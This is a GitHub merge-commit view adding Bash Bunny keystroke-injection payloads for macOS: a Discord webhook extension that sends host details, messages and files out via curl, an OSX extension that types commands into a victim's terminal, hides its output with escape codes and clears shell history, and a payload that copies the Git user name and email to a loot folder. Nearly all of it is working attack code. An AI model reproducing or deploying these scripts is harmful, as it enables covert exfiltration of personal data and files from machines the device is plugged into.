Merge pull request #650 from quentinlamamy/master

Submit Discord exfiltration extension + Github Information Exfiltration Payload
pull/252/merge
Peaks 2024-09-03 12:11:48 -04:00 committed by GitHub
commit 257081013d
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
4 changed files with 452 additions and 0 deletions

86
payloads/extensions/discord.sh Executable file
View File

@ -0,0 +1,86 @@
#!/bin/bash
#
# Title: Discord Extension
# Description: Interact with discord webhook to exfiltrate text or files
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
# Version: 1.0
# Category: Extension
#
# To use this extension, you need to create a webhook on discord and get the webhook id and token
# During your setup steps, you need to set the DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN variables
# DISCORD_WEBHOOK_ID="<DISCORD_WEBHOOK_ID>""
# DISCORD_WEBHOOK_TOKEN="<DISCORD_WEBHOOK_TOKEN>"
function DISCORD() {
case $1 in
# @desc Initialize the exfiltration session by posting an embed message on discord with host information
# @usage DISCORD INIT
# @info This command need a $BB_HOST_* variables (Set by default if you use my OSX extension)
"INIT")
curl_location="https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN"
curl_header="Content-Type: application/json"
Q STRING "printf '\e7'"
Q ENTER
Q STRING "curl --location '$curl_location'"
Q STRING " --header '$curl_header'"
Q STRING " --data '{\"embeds\": [{\"author\": {\"name\": \"New exfiltration session\",\"icon_url\": \"https://cdn-icons-png.flaticon.com/512/2/2235.png\"},\"color\": \"15258703\",\"fields\": [{\"name\":\"OS\",\"value\":\""
Q STRING "'\${BB_HOST_OS}'"
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
Q STRING "'\${BB_HOST_IP_V4}'"
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
Q STRING "'\${BB_HOST_IP_V6}'"
Q STRING "\",\"inline\":true},{\"name\":\"User\",\"value\":\""
Q STRING "'\${BB_HOST_USER}'"
Q STRING "\",\"inline\":true}]"
Q STRING "}]}'"
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER
;;
"SEND")
case $2 in
# @desc Send a message to discord via webhook
# @usage DISCORD SEND MSG $yourMessage
"MSG")
if [[ "$3" == *"$"* ]]; then
message="'$3'"
else
message=$3
fi
Q STRING "printf '\e7'"
Q ENTER
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --header 'Content-Type: application/json' --data '{\"content\": \"$message\"}' && printf '\e[3A\e[K\e[0J'"
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER
;;
# @desc Send a file to discord via webhook
# @usage DISCORD SEND FILE $yourFilePath
"FILE")
Q STRING "printf '\e7'"
Q ENTER
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --form '=@\"$3\"' && printf '\e[3A\e[K\e[0J'"
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER
;;
esac
;;
esac
}
export -f DISCORD

278
payloads/extensions/osx.sh Executable file
View File

@ -0,0 +1,278 @@
#!/bin/bash
#
# Title: OSX Extension
# Description: Allow a bunch of osx interaction
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
# Version: 2.0
# Category: Extension
function OSX() {
case $1 in
"TERMINAL")
case $2 in
# @desc Open a terminal
# @usage OSX TERMINAL OPEN
"OPEN")
Q GUI SPACE
Q STRING terminal
Q ENTER
;;
# @desc Initialize the terminal
# Make the PS1 nicer (just because I like it)
# Grab Host information and store it in BB_OSX vars
# @usage OSX TERMINAL INIT
# @info This command need a focused terminal
"INIT")
Q STRING "bash"
Q ENTER
Q STRING "clear"
Q ENTER
Q STRING "printf '\e7'"
Q ENTER
Q STRING "export PS1='\e[0;31mbashbunny>\e[m '"
Q ENTER
Q STRING 'BB_HOST_USER=$(whoami)'
Q ENTER
Q STRING 'BB_HOST_NAME=$(hostname)'
Q ENTER
Q STRING "BB_HOST_OS='OSX'"
Q ENTER
Q STRING 'BB_HOST_IP_V4=$(curl -s ipinfo.io/ip)'
Q ENTER
Q STRING 'BB_HOST_IP_V6=$(curl -s ident.me)'
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER
;;
# @desc Minimize the terminal
# @usage OSX TERMINAL MINIMIZE
# @info This command need a focused terminal
"MINIMIZE")
Q STRING 'printf \e[2t'
Q ENTER
;;
# @desc Resize the focused terminal
# @usage OSX TERMINAL RESIZE $width $height
# @param <integer> $width The terminal width
# @param <integer> $height The terminal height
# @info This command need a focused terminal
"RESIZE")
Q STRING "printf '\e[8;'$4';'$3't' && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;
# @desc Clear the focused terminal
# @usage OSX TERMINAL ZOOM
# @info This command need a focused terminal
"CLEAR")
Q STRING clear
Q ENTER
;;
# @desc Close all terminal
# @usage OSX TERMINAL CLOSE
# @info This command need a focused terminal
"CLOSE")
Q STRING history -c
Q ENTER
Q STRING killall Terminal
Q ENTER
;;
# @desc Change terminal window name
# @usage OSX TERMINAL NAME <WINDOW_NAME>
# @info This command need a focused terminal
"NAME")
Q STRING "printf '\033]0;'$3'\007' && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;
esac
;;
"NETWORK")
case $2 in
"WIFI")
case $3 in
# @desc Enable wifi
# @usage OSX NETWORK WIFI ENABLE
"ENABLE")
Q STRING "networksetup -setairportpower en0 on"
Q ENTER
;;
# @desc Disable wifi
# @usage OSX NETWORK WIFI DISABLE
"DISABLE")
Q STRING "networksetup -setairportpower en0 off"
Q ENTER
;;
# @desc Connect to a wifi network
# @usage OSX NETWORK CONNECT $ssid $password
# @arg <string> Wifi SSID
# @arg <string> Wifi Password
"CONNECT")
Q STRING "networksetup -setairportnetwork en0 $4 $5"
Q ENTER
;;
esac
;;
"ETHERNET")
;;
esac
;;
"SESSION")
case $2 in
# @desc Shutdown the computer
# @usage OSX SESSION SHUTDOWN
"SHUTDOWN")
Q STRING "osascript -e 'tell app \"System Events\" to shut down'"
Q ENTER
;;
# @desc Restart the computer
# @usage OSX SESSION RESTART
"RESTART")
Q STRING "osascript -e 'tell app \"System Events\" to restart'"
Q ENTER
;;
# @desc Lock the computer
# @usage OSX SESSION LOCK
"LOCK")
Q STRING "osascript -e 'tell app \"System Events\" to sleep'"
Q ENTER
;;
# @desc Logout current session
# @usage OSX SESSION LOGOUT
"LOGOUT")
Q STRING "osascript -e 'tell app \"System Events\" to log out'"
Q ENTER
;;
"GET_USER")
#Q STRING "BB_OSX_USER=$(who | grep console | cut -d ' ' -f 1)"
Q STRING 'BB_OSX_USER=$(whoami)'
Q ENTER
;;
esac
;;
"SOUND")
case $2 in
"PLAY")
Q STRING "afplay $3"
;;
# @desc Change the computer volume
# @usage OSX MISC VOLUME $volumeValue
# @arg <integer> An integer between 0 and 10
"VOLUME")
Q STRING "osascript -e 'set Volume $3'"
Q ENTER
;;
esac
;;
"NOTIFICATION")
case $2 in
"CLEAR")
Q STRING "ps -e | grep /NotificationCenter | grep app | cut -d ' ' -f 1 | xargs kill -9 && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;
"DISPLAY")
if [ -z $6]; then
$6=${1:-"Purr"}
fi
Q STRING "osascript -e 'display notification \"$3\" with title \"$4\" subtitle \"$5\" sound name \"$6\"'"
Q ENTER
;;
esac
;;
"MISC")
case $2 in
# @desc Show or hide desktop icon
# @usage OSX MISC DESKTOP_ICON $action
# @arg <string> HIDE | void
"DESKTOP_ICON")
if [ $3 == "HIDE" ]; then
Q STRING "defaults write com.apple.finder CreateDesktop -bool false && killall Finder"
Q ENTER
else
Q STRING "defaults write com.apple.finder CreateDesktop -bool true && killall Finder"
Q ENTER
fi
;;
# @desc Change wallpaper with the specified url image
# @usage OSX MISC WALLPAPER_URL
"WALLPAPER_URL")
Q STRING "cd ~/Desktop"
Q ENTER
Q STRING "curl $3 > img.bb"
Q ENTER
Q STRING "sqlite3 ~/Library/Application\ Support/Dock/desktoppicture.db \"update data set value = '~/Desktop/img.bb'\" && killall Dock"
Q ENTER
;;
# @desc Say something in the way of bigben
# @usage OSX MISC SAY <VOICE> <TEXT_TO_SAY>
# @info Need a focused terminal
"SAY")
Q STRING "say -v $3 $4 && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;
esac
;;
esac
}
export -f OSX

View File

@ -0,0 +1,30 @@
<div align="center">
# Github Information Exfiltration
**Get Git user name and email from the Git global config and exfiltrate them**
![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white)
![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white)
![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black)
</div>
<img width="1000" alt="banner" src="https://raw.githubusercontent.com/quentinlamamy/bashbunny/main/img/githubExfiltration.jpg"/>
# Dependency
* OSX Extension by quentin_lamamy
# Changelog
v1.0 :
* :tada: Release on 2023/08/20
# Contributing
A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues)
# License
<p xmlns:cc="http://creativecommons.org/ns#" xmlns:dct="http://purl.org/dc/terms/"><a property="dct:title" rel="cc:attributionURL" href="https://github.com/quentinlamamy/bashbunny/blob/main/payloads/githubExfiltration/payload.txt">Github Infos Exfiltration Payload</a> by <a rel="cc:attributionURL dct:creator" property="cc:attributionName" href="https://github.com/quentinlamamy">Quentin Lamamy</a> is licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/4.0/?ref=chooser-v1" target="_blank" rel="license noopener noreferrer" style="display:inline-block;">CC BY-NC-SA 4.0<img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/nc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/sa.svg?ref=chooser-v1"></a></p>
# Support
<a href="https://www.buymeacoffee.com/quentinlamamy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>

View File

@ -0,0 +1,58 @@
#!/bin/bash
#
# Title: OSX Payload to exfiltrate Git user name and email
# Description: Get Git user name and email from the Git global config and exfiltrate them
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
# Version: 1.0
# Category: Exfiltration
# Attackmodes: HID STORAGE
# Target OS: OSX
# Dependency: OSX Extensions
#
# Magenta solid Setup
# Yellow single blink Attack in progress
# Yellow double blink Sync
# Yellow triple blink Cleanup
# Green blink then solid Finished
LED SETUP
ATTACKMODE STORAGE HID VID_0X05AC PID_0X0250
OSX TERMINAL OPEN
Q STRING 'last_mounted_volume=$(ls -t /Volumes | head -n 1)'
Q ENTER
Q STRING 'lootPath=/Volumes/$last_mounted_volume/loot/gitInfos.txt'
Q ENTER
Q STRING 'touch $lootPath'
Q ENTER
LED ATTACK
# Get the user name from the Git global config
Q STRING 'user_name=$(git config --global user.name)'
Q ENTER
# Get the user email from the Git global config
Q STRING 'user_email=$(git config --global user.email)'
Q ENTER
Q STRING 'echo -e "Username: $user_name\nMail: $user_email" > $lootPath'
Q ENTER
# Sync
LED STAGE 2
sync
# Cleanup
LED STAGE 3
# Eject
QUACK STRING 'diskutil eject $last_mounted_volume'
QUACK ENTER
DELAY 100
OSX TERMINAL CLOSE
LED FINISH